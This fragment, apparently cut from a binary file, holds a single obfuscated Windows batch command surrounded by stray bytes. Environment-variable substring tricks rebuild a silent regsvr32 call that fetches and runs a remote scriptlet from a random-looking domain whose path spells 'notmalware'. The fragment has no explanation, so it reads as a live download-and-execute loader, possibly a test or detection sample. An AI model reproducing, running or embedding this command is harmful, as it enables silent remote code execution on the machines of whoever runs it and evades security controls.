 û   P Ù m
 @echo off %ALLUSERSPROFILE:~4,1%egsv%ALLUSERSPROFILE:~4,1%32.exe /s /n /i:http://QqOsHxSUlhTtXbdJEvaGKmWjCN%ALLUSERSPROFILE:~4,1%ewgpMYLZIcf%ALLUSERSPROFILE:~4,1%uPkoDFAynziVB.com/n0tm4lw4%ALLUSERSPROFILE:~4,1%3  û   P Ù m
